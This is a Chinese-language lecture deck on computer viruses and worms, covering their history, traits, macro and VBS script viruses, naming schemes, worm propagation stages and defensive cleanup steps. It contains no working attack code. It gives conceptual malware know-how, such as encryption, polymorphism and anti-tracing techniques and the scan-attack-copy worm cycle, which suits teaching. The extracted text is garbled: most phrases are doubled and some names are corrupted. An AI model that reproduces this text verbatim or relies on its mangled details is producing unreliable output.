《计算机病毒技术课件》由会员分享,可在线阅读,更多相关《计算机病毒技术课件(55页珍藏版)》请在金锄头文库上搜索。
1、计算机病毒技术计算机病毒技术l主要内容主要内容l介绍计算机病毒的历史、病毒的基本特征、病介绍计算机病毒的历史、病毒的基本特征、病毒的命名、病毒的预防及清除等毒的命名、病毒的预防及清除等l介绍蠕虫分类、技术特点、基本结构、传播过介绍蠕虫分类、技术特点、基本结构、传播过程、对蠕虫的防范和清除方法等程、对蠕虫的防范和清除方法等1恶意程序的种类恶意程序的种类1 1、陷门(或称后门)、陷门(或称后门)2 2、逻辑炸弹、逻辑炸弹3 3、特洛伊木马、特洛伊木马4 4、病毒、病毒5 5、蠕虫、蠕虫6 6、细菌、细菌7 7、流氓软件、流氓软件2计算机病毒的历史计算机病毒的历史l19831983年首次确认计算机病
2、毒,年首次确认计算机病毒,19881988年美国研究生年美国研究生莫里莫里斯斯编写的蠕虫病毒首次造成重大经济损失,引起了人编写的蠕虫病毒首次造成重大经济损失,引起了人们的广泛重视。我国从上世纪八十年代开始发现计算们的广泛重视。我国从上世纪八十年代开始发现计算机病毒,如机病毒,如 黑色星期五黑色星期五 , 米氏病毒米氏病毒 , 小球病毒小球病毒 等。等。l计算机病毒经历了从计算机病毒经历了从dosdos病毒到病毒到windowswindows病毒,再到网病毒,再到网络蠕虫的发展过程,计算机病毒的种类层出不穷。络蠕虫的发展过程,计算机病毒的种类层出不穷。l伴随着计算机病毒的发展,杀毒软件和防病毒软
3、件也伴随着计算机病毒的发展,杀毒软件和防病毒软件也得到了迅速的发展得到了迅速的发展3计算机病毒的定义计算机病毒的定义l计算机病毒:计算机病毒:l是指编制或者在计算机程序中插入破坏计算机功能是指编制或者在计算机程序中插入破坏计算机功能或者毁坏数据,影响计算机使用,并能自我复制的或者毁坏数据,影响计算机使用,并能自我复制的一组计算机指令或者程序代码。一组计算机指令或者程序代码。4计算机病毒产生的原因计算机病毒产生的原因1 1、恶作剧或表现自己、恶作剧或表现自己2 2、经济利益、经济利益3 3、个别人的报复心理、个别人的报复心理4 4、版权保护、版权保护5 5、政治目的、政治目的5计算机病毒的特征计
4、算机病毒的特征l传染性传染性l判别一个程序是否为计算机病毒的最重要条件判别一个程序是否为计算机病毒的最重要条件 l隐蔽性隐蔽性l病毒一般只有几百或病毒一般只有几百或1 1k k字节,附在正常程序内或磁盘上,很字节,附在正常程序内或磁盘上,很难区别病毒程序与正常程序。难区别病毒程序与正常程序。l潜伏性潜伏性l只有在满足其特定条件时才启动其表现(破坏)模块只有在满足其特定条件时才启动其表现(破坏)模块 l表现性表现性l任何病毒只要侵入系统,都会对系统及应用程序产生程度不任何病毒只要侵入系统,都会对系统及应用程序产生程度不同的影响。同的影响。 6病毒的传染性病毒的传染性l计算机病毒的传染性是指病毒具
5、有把自身复制到其它计算机病毒的传染性是指病毒具有把自身复制到其它媒体的特性。这些媒体可以是程序、文件或存储介质。媒体的特性。这些媒体可以是程序、文件或存储介质。l病毒传染的种类病毒传染的种类l文件传染:文件传染:l包括传染可执行文件、文档文件、数据文件和包括传染可执行文件、文档文件、数据文件和webweb文件等文件等l引导扇区传染引导扇区传染l引导扇区是系统第一次读该磁盘或引导系统时要读取的地方,引导扇区是系统第一次读该磁盘或引导系统时要读取的地方,因此只要访问磁盘就可能传染引导扇区病毒因此只要访问磁盘就可能传染引导扇区病毒l网络传染网络传染l通过网络直接进入目标主机,而不需要通过染毒文件作为
6、载通过网络直接进入目标主机,而不需要通过染毒文件作为载体,典型代表是蠕虫病毒体,典型代表是蠕虫病毒文件感染性病毒和引导区病毒都需要具有自我检测的文件感染性病毒和引导区病毒都需要具有自我检测的功能,以避免二次感染造成自身的崩溃。功能,以避免二次感染造成自身的崩溃。7病毒的隐蔽性病毒的隐蔽性l病毒程序一般都很小,只有几百或病毒程序一般都很小,只有几百或1 1k k字节,通常会把字节,通常会把自己嵌入到染毒文件中,并且不会改变染毒文件的属自己嵌入到染毒文件中,并且不会改变染毒文件的属性性( (如最后修改时间、只读属性等如最后修改时间、只读属性等) )。l病毒程序在保证自己运行的前提下,通常会使系统和
7、病毒程序在保证自己运行的前提下,通常会使系统和染毒文件也能正常运行。染毒文件也能正常运行。l病毒编写者在编制病毒程序时通常会加入很多非正常病毒编写者在编制病毒程序时通常会加入很多非正常的跳转指令或采用加密技术以避免病毒程序被破解。的跳转指令或采用加密技术以避免病毒程序被破解。8病毒的潜伏性病毒的潜伏性l病毒的潜伏性是指病毒具有依附其它媒体而寄病毒的潜伏性是指病毒具有依附其它媒体而寄生的能力。生的能力。l计算机病毒只有当满足某种触发条件时才会发计算机病毒只有当满足某种触发条件时才会发作,这些触发条件包括三种:作,这些触发条件包括三种:l利用时间触发:包括系统时间和病毒内自带的计数利用时间触发:包
8、括系统时间和病毒内自带的计数器器l利用计算机内执行的特定操作触发利用计算机内执行的特定操作触发l外部命令触发外部命令触发9病毒的表现性病毒的表现性l病毒的表现性是指当病毒被触发时,病毒在染毒计算病毒的表现性是指当病毒被触发时,病毒在染毒计算机上发作所表现出的症状和破坏性。机上发作所表现出的症状和破坏性。l病毒的表现性包括:病毒的表现性包括:1 1、有益的服务、有益的服务2 2、占用、占用CPUCPU资源资源3 3、干扰系统运行、干扰系统运行4 4、干扰键盘、喇叭或屏幕、干扰键盘、喇叭或屏幕5 5、干扰打印机、干扰打印机6 6、攻击、攻击CMOSCMOS,攻击硬件攻击硬件7 7、攻击系统数据区、
9、攻击系统数据区8 8、攻击文件、攻击文件9 9、攻击内存、攻击内存1010、窃取机密信息、窃取机密信息1111、窃取核心控制权、窃取核心控制权1212、破坏网络系统、破坏网络系统10病毒的分类病毒的分类l引导型病毒引导型病毒l文件型病毒文件型病毒l宏病毒宏病毒l蠕虫病毒蠕虫病毒l木马病毒木马病毒l脚本病毒脚本病毒l多态性病毒多态性病毒11计算机病毒的表现现象计算机病毒的表现现象l经常死机经常死机l运行速度变慢运行速度变慢l打印和通信异常打印和通信异常l系统文件属性发生变化系统文件属性发生变化l磁盘空间减少磁盘空间减少l自动链接某些网站自动链接某些网站l系统无法启动系统无法启动l文档丢失或破坏文
10、档丢失或破坏l网络瘫痪网络瘫痪12计算机病毒的一般组成计算机病毒的一般组成l安装模块安装模块l传染模块传染模块l破坏模块破坏模块13计算机病毒制作技术计算机病毒制作技术l采用自加密技术采用自加密技术l采用变形技术采用变形技术l采用特殊的隐形技术采用特殊的隐形技术l对抗计算机病毒防范系统对抗计算机病毒防范系统l反跟踪技术反跟踪技术l利用中断处理机制利用中断处理机制14宏病毒宏病毒l宏病毒是使用宏语言编写的程序,可以在一些数据处宏病毒是使用宏语言编写的程序,可以在一些数据处理系统中运行,存在于字处理文档、数据表格、数据理系统中运行,存在于字处理文档、数据表格、数据库、演示文档等数据文件中,利用宏语
11、言的功能将自库、演示文档等数据文件中,利用宏语言的功能将自己复制并且繁殖到其它数据文档中己复制并且繁殖到其它数据文档中15宏的概念宏的概念l宏是指一段类似于批处理命令的多行代码的集合。宏是指一段类似于批处理命令的多行代码的集合。l宏设计的目的是为了简化我们的工作,它可以记录命宏设计的目的是为了简化我们的工作,它可以记录命令和记录,然后自动运行,而宏病毒则是利用了宏自令和记录,然后自动运行,而宏病毒则是利用了宏自动运行的特点动运行的特点16宏的种类与编写宏的种类与编写l在在word等办公软件中有许多等办公软件中有许多“内建宏内建宏”,当用户进,当用户进行打开文件、新建文件、保存文件、打印文件和关
12、闭行打开文件、新建文件、保存文件、打印文件和关闭文件等操作时,会调用这些宏,例如打开文件之前调文件等操作时,会调用这些宏,例如打开文件之前调用用、打印文件之前调用等,还有一些会自动调用的全打印文件之前调用等,还有一些会自动调用的全局宏,如局宏,如AutoOpen、AutoClose、AutoNew等等l编写宏的操作如下编写宏的操作如下l按按Alt_F11打开宏编辑窗口,右键单击打开宏编辑窗口,右键单击“Normal”,选择选择“插入插入-模块模块”,然后输入代码并保存,然后输入代码并保存17宏病毒如何传播宏病毒如何传播l宏包括两种:宏包括两种:l每个文档中间包含的宏,如每个文档中间包含的宏,如
13、l为所有打开的文档共用的宏,如为所有打开的文档共用的宏,如AutoOpenl宏病毒一般首先隐藏在一个指定的宏病毒一般首先隐藏在一个指定的Word文件中,一旦运行该文件,文件中,一旦运行该文件,宏病毒即被运行。宏病毒首先将自身拷贝到全局宏的区域,使得宏病毒即被运行。宏病毒首先将自身拷贝到全局宏的区域,使得所有打开的文件都会使用该宏。所有打开的文件都会使用该宏。l当当Word退出时,全局宏将被存放在某个全局的模板文件中退出时,全局宏将被存放在某个全局的模板文件中。当当Word再次运行时会自动装入病毒并执行。再次运行时会自动装入病毒并执行。18如何发现宏病毒如何发现宏病毒l选择菜单:选择菜单:“工具
14、工具”-“宏宏”-“宏宏” 或直接按或直接按Alt+F11,如果发现有很多以如果发现有很多以“Auto”开始的宏,那开始的宏,那么很可能被宏病毒感染了么很可能被宏病毒感染了19如何清除宏病毒如何清除宏病毒l将感染宏病毒的将感染宏病毒的word文件另存为文件另存为RTF格式,然后退出格式,然后退出文档编辑器,再删除已感染的文档文件、文档编辑器,再删除已感染的文档文件、 normal.dot和安装目录下的和安装目录下的startup子目录下的文件子目录下的文件lWord文件转换为文件转换为RTF格式会导致正常使用的宏丢失,格式会导致正常使用的宏丢失,因此需要事先保存这些宏,再清除病毒后再恢复这些因
15、此需要事先保存这些宏,再清除病毒后再恢复这些正常的宏正常的宏20脚本病毒脚本病毒l脚本病毒是使用脚本语言编写的计算机病毒,其编写脚本病毒是使用脚本语言编写的计算机病毒,其编写方法比用其它语言简单,且具有传播快、破坏力大的方法比用其它语言简单,且具有传播快、破坏力大的特点特点l典型案例典型案例l“爱虫爱虫”病毒、病毒、“新欢乐时光新欢乐时光”病毒病毒21WSH简介简介lWSH概念概念l是是Windows Scripting Host的缩写,即的缩写,即Windows脚本宿主脚本宿主lWSH最早出现于最早出现于Windows98系统,可以解释执行脚系统,可以解释执行脚本语言本语言lWSH默认脚本宿
16、主可以设为默认脚本宿主可以设为wscript.exe或或cscript.exe22VBS脚本病毒的特点脚本病毒的特点l编写简单编写简单l破坏力大破坏力大l传染力强传染力强l传播范围大传播范围大l病毒源码容易被获取,变种多病毒源码容易被获取,变种多l欺骗性强欺骗性强l使得病毒生产机实现起来非常容易使得病毒生产机实现起来非常容易23VBS脚本病毒的弱点脚本病毒的弱点l绝大部分绝大部分VBS脚本病毒运行时需要用到一个对象:脚本病毒运行时需要用到一个对象:lVBS代码是通过代码是通过WSH来解释执行的来解释执行的lVBS脚本病毒的运行需要关联程序脚本病毒的运行需要关联程序Wscript.exe的支持的
17、支持l通过网页传播的病毒需要通过网页传播的病毒需要ActiveX的支持的支持l通过通过E_mail传播的病毒需要传播的病毒需要OutlookExpress的自动发送邮件功能的自动发送邮件功能支持,而绝大部分支持,而绝大部分VBS脚本病毒都是以脚本病毒都是以E_mail做为主要传播方式做为主要传播方式的的24VBS脚本病毒的预防和解除脚本病毒的预防和解除l禁用文件系统对象禁用文件系统对象l用用regsvr32 scrrun.dll /u命令可以禁止文件系统对象,或直命令可以禁止文件系统对象,或直接查找接查找scrrun.dll文件删除或改名文件删除或改名l卸载卸载Windows Scriptin
18、g Hostl进入进入“控制面板控制面板”中的中的“添加添加/删除程序删除程序”卸载该组件卸载该组件l删除删除VBS、VBE、JS、JSE 文件后缀名与应用程序文件后缀名与应用程序的关联的关联l进入进入“我的电脑我的电脑”-“察看察看”-“文件夹选项文件夹选项”-“文件类型文件类型”,然后删除这些文件后缀名与应用程序的关联,然后删除这些文件后缀名与应用程序的关联l在在Windows目录中,找到目录中,找到Wscript.exe并删除或改名并删除或改名25VBS脚本病毒的预防和解除脚本病毒的预防和解除l自定义安全级别,将自定义安全级别,将“Internet选项选项”中设置禁用中设置禁用Activ
19、eX控件及插件控件及插件l禁止禁止OutlookExpress的自动收发邮件功能的自动收发邮件功能l设置显示文件扩展名设置显示文件扩展名l将系统的网络连接的安全级别设置至少为将系统的网络连接的安全级别设置至少为“中等中等”l杀毒软件杀毒软件26计算机杀毒软件制作技术计算机杀毒软件制作技术l特征代码法特征代码法l校验和法校验和法l行为监测法行为监测法l虚拟机技术虚拟机技术l主动内核技术主动内核技术l启发扫描的反病毒技术启发扫描的反病毒技术l实时反病毒技术实时反病毒技术l邮件病毒防杀技术邮件病毒防杀技术27病毒的命名规则病毒的命名规则l一般格式为:一般格式为:l. l病毒前缀是指一个病毒的种类,他
20、是用来区别病毒前缀是指一个病毒的种类,他是用来区别病毒的种族分类的。病毒的种族分类的。l病毒后缀是指一个病毒的变种特征,是用来区病毒后缀是指一个病毒的变种特征,是用来区别具体某个家族病毒的某个变种的。一般都采别具体某个家族病毒的某个变种的。一般都采用英文中的用英文中的26个字母来表示。个字母来表示。28病毒的命名一病毒的命名一l系统病毒系统病毒l系统病毒的前缀是系统病毒的前缀是Win32Win32、PEPE、Win95Win95、W32W32、W95W95等。这些病等。这些病毒的一般公有的特性是可以感染毒的一般公有的特性是可以感染windowswindows操作系统的操作系统的 *. *.ex
21、e exe 和和 *. *.dll dll 文件,并通过这些文件进行传播。如文件,并通过这些文件进行传播。如CIHCIH病毒。病毒。l蠕虫病毒蠕虫病毒 l蠕虫病毒的前缀是蠕虫病毒的前缀是WormWorm。这种病毒的公有特性是通过网络或这种病毒的公有特性是通过网络或者系统漏洞进行传播,很大部分的蠕虫病毒都有向外发送带者系统漏洞进行传播,很大部分的蠕虫病毒都有向外发送带毒邮件,阻塞网络的特性。比如冲击波(阻塞网络),小邮毒邮件,阻塞网络的特性。比如冲击波(阻塞网络),小邮差(发带毒邮件)等。差(发带毒邮件)等。29病毒的命名二病毒的命名二l木马病毒、黑客病毒木马病毒、黑客病毒l木马病毒的前缀是木马
22、病毒的前缀是TrojanTrojan,黑客病毒前缀是黑客病毒前缀是 HackHack。木马病木马病毒通常是通过网络或者系统漏洞进入用户的系统并隐藏,然毒通常是通过网络或者系统漏洞进入用户的系统并隐藏,然后向外界泄露用户的信息,而黑客病毒则有一个可视的界面,后向外界泄露用户的信息,而黑客病毒则有一个可视的界面,能对用户的电脑进行远程控制。木马、黑客病毒往往是成对能对用户的电脑进行远程控制。木马、黑客病毒往往是成对出现的。出现的。l脚本病毒脚本病毒 l病毒的前缀是病毒的前缀是ScriptScript。脚本病毒的公有特性是使用脚本语言脚本病毒的公有特性是使用脚本语言编写,通过网页进行的传播的病毒。脚
23、本病毒还会有如下前编写,通过网页进行的传播的病毒。脚本病毒还会有如下前缀:缀:VBSVBS、JSJS(表明是何种脚本编写的)。如欢乐时光表明是何种脚本编写的)。如欢乐时光(VBS.HappytimeVBS.Happytime)、)、十四日(十四日(Js.Fortnight.c.sJs.Fortnight.c.s)等。等。l宏病毒宏病毒l宏病毒的前缀是宏病毒的前缀是MacroMacro,第二前缀是:第二前缀是:WordWord、Word97Word97、ExcelExcel、Excel97Excel97等其中之一。如:著名的美丽莎等其中之一。如:著名的美丽莎( (Macro.Melissa)Ma
24、cro.Melissa)。30病毒的命名三病毒的命名三l后门病毒后门病毒l后门病毒的前缀是后门病毒的前缀是BackdoorBackdoor。该类病毒的公有特性是通过网该类病毒的公有特性是通过网络传播,给系统开后门,给用户电脑带来安全隐患。如后门络传播,给系统开后门,给用户电脑带来安全隐患。如后门Backdoor.IRCBot Backdoor.IRCBot 。l病毒种植程序病毒病毒种植程序病毒l病毒的前缀是病毒的前缀是DrooperDrooper,这类病毒公有特性是运行时会从体这类病毒公有特性是运行时会从体内释放出一个或几个新的病毒到系统目录下,由释放出来的内释放出一个或几个新的病毒到系统目录
25、下,由释放出来的新病毒产生破坏。如:冰河播种者(新病毒产生破坏。如:冰河播种者(Dropper.BingHe2.2CDropper.BingHe2.2C)、)、MSNMSN射手射手( (Dropper.Worm.Smibag)Dropper.Worm.Smibag)等。等。l破坏性程序病毒破坏性程序病毒 l破坏性程序病毒的前缀是破坏性程序病毒的前缀是HarmHarm。这类病毒的公有特性是本身这类病毒的公有特性是本身具有好看的图标来诱惑用户点击,当用户点击这类病毒时,具有好看的图标来诱惑用户点击,当用户点击这类病毒时,病毒便会直接对用户计算机产生破坏。如:格式化病毒便会直接对用户计算机产生破坏。
26、如:格式化C C盘盘(Harm.formatC.fHarm.formatC.f)、)、杀手命令(杀手命令(mand.Killermand.Killer)等。等。31病毒的命名四病毒的命名四l玩笑病毒玩笑病毒l玩笑病毒的前缀是玩笑病毒的前缀是JokeJoke,也称恶作剧病毒。这类病毒的公有也称恶作剧病毒。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击,当用户点击这特性是本身具有好看的图标来诱惑用户点击,当用户点击这类病毒时,病毒会做出各种破坏操作来吓唬用户,其实病毒类病毒时,病毒会做出各种破坏操作来吓唬用户,其实病毒并没有对用户电脑进行任何破坏。如:女鬼并没有对用户电脑进行任何破坏。如:女
27、鬼(Joke.GirlghostJoke.Girlghost)病毒。病毒。l捆绑机病毒捆绑机病毒l捆绑机病毒的前缀是:捆绑机病毒的前缀是:BinderBinder。这类病毒的公有特性是病毒这类病毒的公有特性是病毒作者会使用特定的捆绑程序将病毒与一些应用程序如作者会使用特定的捆绑程序将病毒与一些应用程序如QQQQ、IEIE捆绑起来,表面上看是一个正常的文件,当用户运行这些捆捆绑起来,表面上看是一个正常的文件,当用户运行这些捆绑病毒时,会表面上运行这些应用程序,然后隐藏运行捆绑绑病毒时,会表面上运行这些应用程序,然后隐藏运行捆绑在一起的病毒,从而给用户造成危害。如:捆绑在一起的病毒,从而给用户造成
28、危害。如:捆绑QQQQ(Binder.QQPass.QQBinBinder.QQPass.QQBin)、)、系统杀手系统杀手(Binder.killsysBinder.killsys)等。等。32计算机病毒的预防计算机病毒的预防1 1、安装防病毒产品并及时更新最新的病毒特征库、安装防病毒产品并及时更新最新的病毒特征库 2 2、安装防火墙、安装防火墙3 3、补齐系统漏洞及应用程序漏洞、补齐系统漏洞及应用程序漏洞4 4、不打开来历不明的邮件中的附件、不打开来历不明的邮件中的附件5 5、对外来的软盘、光盘和其它存储介质,及对电子邮、对外来的软盘、光盘和其它存储介质,及对电子邮件和互联网文件进行病毒检
29、查。件和互联网文件进行病毒检查。6 6、尽量不从不可靠的渠道下载软件、尽量不从不可靠的渠道下载软件7 7、不访问恶意网页、不访问恶意网页8 8、善于从异常情况中发现病毒并予以清除、善于从异常情况中发现病毒并予以清除33计算机病毒的清除计算机病毒的清除l由于病毒通常会把自身嵌入或替换染毒文件,因此我由于病毒通常会把自身嵌入或替换染毒文件,因此我们一方面要养成定期数据备份的好习惯,另外在杀病们一方面要养成定期数据备份的好习惯,另外在杀病毒前也要将染毒文件做好毒前也要将染毒文件做好备份备份,以免在杀病毒的同时,以免在杀病毒的同时破坏了原有文件,给自己造成损失。破坏了原有文件,给自己造成损失。l使用杀
30、毒软件进行杀毒,杀毒软件必须先查杀内存中使用杀毒软件进行杀毒,杀毒软件必须先查杀内存中的病毒,再杀磁盘中的病毒,否则需要用干净的引导的病毒,再杀磁盘中的病毒,否则需要用干净的引导盘启动后再用杀毒软件杀毒。盘启动后再用杀毒软件杀毒。l杀毒软件的病毒特征库必须是最新的,并且最好能用杀毒软件的病毒特征库必须是最新的,并且最好能用两种以上的杀毒软件进行杀毒,降低某种杀毒软件可两种以上的杀毒软件进行杀毒,降低某种杀毒软件可能存在的缺陷而漏过某些病毒。能存在的缺陷而漏过某些病毒。34蠕虫病毒蠕虫病毒l蠕虫病毒是指通过复制自身,并将副本通过网络传到蠕虫病毒是指通过复制自身,并将副本通过网络传到其他计算机上的
31、程序。其他计算机上的程序。l蠕虫病毒具有病毒的一些共性,如传染性、隐蔽性、蠕虫病毒具有病毒的一些共性,如传染性、隐蔽性、潜伏性、破坏性等。潜伏性、破坏性等。l在产生的破坏性上,蠕虫病毒也不是普通病毒所能比在产生的破坏性上,蠕虫病毒也不是普通病毒所能比拟的,网络的发展使得蠕虫可以在短时间内蔓延整个拟的,网络的发展使得蠕虫可以在短时间内蔓延整个网络,造成网络瘫痪。网络,造成网络瘫痪。35蠕虫所造成的破坏蠕虫所造成的破坏病毒名称病毒名称 持续时间持续时间 造成损失造成损失 莫里斯蠕虫莫里斯蠕虫 1988年年 6000多台计算机停机,直接经济损失多台计算机停机,直接经济损失达达9600万美元万美元!
32、美丽杀手美丽杀手 1999年年 政府部门和一些大公司紧急关闭了网络政府部门和一些大公司紧急关闭了网络服务器,经济损失超过服务器,经济损失超过12亿美元亿美元! 爱虫病毒爱虫病毒 2000年年5月至今月至今 众多用户电脑被感染,损失超过众多用户电脑被感染,损失超过100亿亿美元以上美元以上 红色代码红色代码 2001年年7月月 网络瘫痪,直接经济损失超过网络瘫痪,直接经济损失超过26亿美元亿美元 求职信求职信 2001年年12月至今月至今 大量病毒邮件堵塞服务器,损失达数百大量病毒邮件堵塞服务器,损失达数百亿美元亿美元 Sql蠕虫王蠕虫王 2003年年1月月 网络大面积瘫痪,银行自动提款机运做网
33、络大面积瘫痪,银行自动提款机运做中断,直接经济损失超过中断,直接经济损失超过26亿美元亿美元 36蠕虫与一般病毒的异同蠕虫与一般病毒的异同l一般的病毒是需要寄生的,它可以通过自己指令的执一般的病毒是需要寄生的,它可以通过自己指令的执行,将自己的指令代码写到其他程序的体内,而被感行,将自己的指令代码写到其他程序的体内,而被感染的文件就被称为染的文件就被称为”宿主宿主”。l蠕虫一般不采取插入文件的方法,而是复制自身在互蠕虫一般不采取插入文件的方法,而是复制自身在互联网环境下进行传播。一般病毒的传染能力主要是针联网环境下进行传播。一般病毒的传染能力主要是针对计算机内的文件系统而言,而蠕虫的传染目标是
34、互对计算机内的文件系统而言,而蠕虫的传染目标是互联网内的所有计算机。联网内的所有计算机。l局域网条件下的共享文件夹,电子邮件局域网条件下的共享文件夹,电子邮件emailemail,网络网络中的恶意网页,大量存在着漏洞的服务器等都成为蠕中的恶意网页,大量存在着漏洞的服务器等都成为蠕虫传播的良好途径。虫传播的良好途径。37蠕虫的技术特点蠕虫的技术特点l利用操作系统和应用程序的漏洞主动进行攻击利用操作系统和应用程序的漏洞主动进行攻击l此类病毒主要有此类病毒主要有“红色代码红色代码”、“尼姆达尼姆达”、”求求职信职信”等。等。l“尼姆达尼姆达”病毒和病毒和“红色代码红色代码”病毒是利用了微软病毒是利用
35、了微软IISIIS服务器软件的漏洞,服务器软件的漏洞,“SqlSql蠕虫王蠕虫王”病毒则是利病毒则是利用了用了SQL Server2000SQL Server2000的一个漏洞。的一个漏洞。l传播方式多样传播方式多样l如如“尼姆达尼姆达”病毒和病毒和”求职信求职信”病毒,可利用的传病毒,可利用的传播途径包括文件、邮件附件、播途径包括文件、邮件附件、WebWeb服务器、网络共服务器、网络共享等。享等。38蠕虫的技术特点蠕虫的技术特点l病毒制作技术与传统的病毒不同病毒制作技术与传统的病毒不同l蠕虫病毒可以采用脚本语言编写,制作相对简单。蠕虫病毒可以采用脚本语言编写,制作相对简单。l与黑客技术相结合
36、与黑客技术相结合! ! 潜在的威胁和损失更大。潜在的威胁和损失更大。l以红色代码为例,感染后的机器的以红色代码为例,感染后的机器的webweb目录的目录的 scriptsscripts下将生成一个下将生成一个root.exeroot.exe,可以远程执行任可以远程执行任何命令,从而使黑客能够再次进入何命令,从而使黑客能够再次进入! !39蠕虫的基本结构蠕虫的基本结构l蠕虫的基本程序结构为:蠕虫的基本程序结构为:l传播模块传播模块l负责蠕虫的传播。负责蠕虫的传播。 l隐藏模块隐藏模块l侵入主机后,隐藏蠕虫程序,防止被用户发现。侵入主机后,隐藏蠕虫程序,防止被用户发现。l目的功能模块目的功能模块l
37、实现对计算机的控制、监视或破坏等功能。实现对计算机的控制、监视或破坏等功能。l蠕虫的传播技术是蠕虫技术的首要技术,传播模块实蠕虫的传播技术是蠕虫技术的首要技术,传播模块实现的实际上是自动入侵的功能。没有蠕虫的传播技术,现的实际上是自动入侵的功能。没有蠕虫的传播技术,也就谈不上什么蠕虫技术了也就谈不上什么蠕虫技术了 40蠕虫的传播过程蠕虫的传播过程l传播模块分为:传播模块分为:l扫描模块、攻击模块和复制模块。扫描模块、攻击模块和复制模块。 l蠕虫程序的一般传播过程为:蠕虫程序的一般传播过程为: 1.1.扫描扫描:由蠕虫的扫描功能模块负责探测存在漏洞的:由蠕虫的扫描功能模块负责探测存在漏洞的主机。
38、当程序向某个主机发送探测漏洞的信息并收到主机。当程序向某个主机发送探测漏洞的信息并收到成功的反馈信息后,就得到一个可传播的对象。成功的反馈信息后,就得到一个可传播的对象。 2.2.攻击攻击:攻击模块按漏洞攻击步骤自动攻击步骤:攻击模块按漏洞攻击步骤自动攻击步骤1 1中中找到的对象,取得该主机的权限(一般为管理员权限)找到的对象,取得该主机的权限(一般为管理员权限),获得一个,获得一个shellshell。 3.3.复制复制:复制模块通过原主机和新主机的交互将蠕虫:复制模块通过原主机和新主机的交互将蠕虫程序复制到新主机并启动。程序复制到新主机并启动。41蠕虫所造成的威胁蠕虫所造成的威胁l蠕虫所造
39、成的主要威胁包括:蠕虫所造成的主要威胁包括:l占用了大量网络带宽,造成网络拥塞,网络性能急剧下降。占用了大量网络带宽,造成网络拥塞,网络性能急剧下降。l消耗系统资源,导致系统的性能下降。消耗系统资源,导致系统的性能下降。l有些蠕虫还会在染毒机器上留有后门,威胁计算机的安全。有些蠕虫还会在染毒机器上留有后门,威胁计算机的安全。l蠕虫的扫描策略蠕虫的扫描策略l随机选取某一段随机选取某一段IPIP地址,然后对这一地址段上的主机扫描。地址,然后对这一地址段上的主机扫描。有些扫描程序会不断重复上面这一过程。这样,随着蠕虫的有些扫描程序会不断重复上面这一过程。这样,随着蠕虫的传播,新感染的主机也开始进行这
40、种扫描,这些扫描程序不传播,新感染的主机也开始进行这种扫描,这些扫描程序不知道那些地址已经被扫描过,它只是简单的随机扫描互联网。知道那些地址已经被扫描过,它只是简单的随机扫描互联网。于是蠕虫传播的越广,网络上的扫描包就越多。于是蠕虫传播的越广,网络上的扫描包就越多。l蠕虫传播的其它方式蠕虫传播的其它方式l例如利用邮件地址薄获得邮件地址,群发带有蠕虫程序的邮例如利用邮件地址薄获得邮件地址,群发带有蠕虫程序的邮件,用户收到邮件后邮件被动打开,蠕虫程序启动件,用户收到邮件后邮件被动打开,蠕虫程序启动42企业用户对蠕虫病毒的防范措施企业用户对蠕虫病毒的防范措施l加强网络管理员安全管理水平,提高安全意识
41、加强网络管理员安全管理水平,提高安全意识l建立病毒检测系统建立病毒检测系统l建立应急响应系统建立应急响应系统l建立灾难备份系统建立灾难备份系统l对于局域网而言,可以采用以下一些主要手段:对于局域网而言,可以采用以下一些主要手段:l在因特网接入口处安装防杀计算机病毒产品,将病毒隔离在在因特网接入口处安装防杀计算机病毒产品,将病毒隔离在局域网之外。局域网之外。l对邮件服务器进行监控,防止带毒邮件进行传播。对邮件服务器进行监控,防止带毒邮件进行传播。l对局域网用户进行安全培训。对局域网用户进行安全培训。43个人用户对蠕虫病毒的防范措施个人用户对蠕虫病毒的防范措施l安装合适的杀毒软件安装合适的杀毒软件
42、l经常升级病毒库经常升级病毒库l提高防杀毒意识,不要轻易去点击陌生的站点提高防杀毒意识,不要轻易去点击陌生的站点l不随意查看陌生邮件,尤其是带有附件的邮件不随意查看陌生邮件,尤其是带有附件的邮件44如何预防和清除蠕虫如何预防和清除蠕虫l补齐系统和应用软件的补丁程序补齐系统和应用软件的补丁程序l安装防病毒软件安装防病毒软件l利用蠕虫专杀工具利用蠕虫专杀工具l手工清除蠕虫手工清除蠕虫l注意注意: :l根据蠕虫利用网络传播的特点,因此在杀蠕虫时需要切断染根据蠕虫利用网络传播的特点,因此在杀蠕虫时需要切断染毒机器与网络的连接,否则在杀蠕虫的同时又会不断地重新毒机器与网络的连接,否则在杀蠕虫的同时又会不
43、断地重新感染。感染。45如何手工清除蠕虫如何手工清除蠕虫l在蠕虫专杀工具尚未公布之前,需要通过手工清除蠕在蠕虫专杀工具尚未公布之前,需要通过手工清除蠕虫,手工清除掌握四要素:漏洞、内存、注册表、文虫,手工清除掌握四要素:漏洞、内存、注册表、文件。件。l清除步骤如下:清除步骤如下:1 1、给系统漏洞打补丁、给系统漏洞打补丁2 2、清除内存中的病毒进程、清除内存中的病毒进程 3 3、删除注册表中的病毒项、删除注册表中的病毒项 为了每次开机自动启动,蠕虫会修改注册表中的启动项,为了每次开机自动启动,蠕虫会修改注册表中的启动项,具体位置是具体位置是HKEY_LOCAL_MACHINESOFTWAREM
44、icrosoftWindowsCurrenHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRuntVersionRun4 4、删除病毒文件。、删除病毒文件。 如果该文件不能删除,则进入安全模式或者用如果该文件不能删除,则进入安全模式或者用A A盘直接启盘直接启动到动到DOSDOS模式下进行删除。模式下进行删除。46云安全技术云安全技术l“云安全云安全”技术是网络时代信息安全的最新体现,它融合了并行技术是网络时代信息安全的最新体现,它融合了并行处理、网格计算、未知病毒行为判断等新兴技术和概念,通过网处理、网格计算、未知病毒行为判断等
45、新兴技术和概念,通过网状的大量客户端对网络中软件行为的异常监测,获取互联网中木状的大量客户端对网络中软件行为的异常监测,获取互联网中木马、恶意程序的最新信息,发送到服务端进行自动分析和处理,马、恶意程序的最新信息,发送到服务端进行自动分析和处理,然后再把病毒和木马的解决方案分发到每一个客户端。然后再把病毒和木马的解决方案分发到每一个客户端。l云安全技术应用后,识别和查杀病毒不再仅仅依靠本地硬盘中的云安全技术应用后,识别和查杀病毒不再仅仅依靠本地硬盘中的病毒库,而是依靠庞大的网络服务,实时进行采集、分析以及处病毒库,而是依靠庞大的网络服务,实时进行采集、分析以及处理。整个互联网就是一个巨大的理。
